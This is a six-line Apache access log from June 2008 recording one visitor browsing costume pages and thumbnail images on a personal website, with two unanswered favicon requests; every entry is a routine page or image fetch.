133.9.4.11 - - [24/Jun/2008:21:24:01 -0500] "GET /costume/costume2.htm HTTP/1.1" 200 1810 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
133.9.4.11 - - [24/Jun/2008:21:24:01 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
133.9.4.11 - - [24/Jun/2008:21:24:02 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
133.9.4.11 - - [24/Jun/2008:21:24:03 -0500] "GET /costume/thmb1.htm HTTP/1.1" 200 3799 "http://tomdolan.pconline.com/costume/costume2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
133.9.4.11 - - [24/Jun/2008:21:24:04 -0500] "GET /costume/costm1.jpg HTTP/1.1" 200 59753 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
133.9.4.11 - - [24/Jun/2008:21:24:04 -0500] "GET /costume/costm3.jpg HTTP/1.1" 200 39529 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
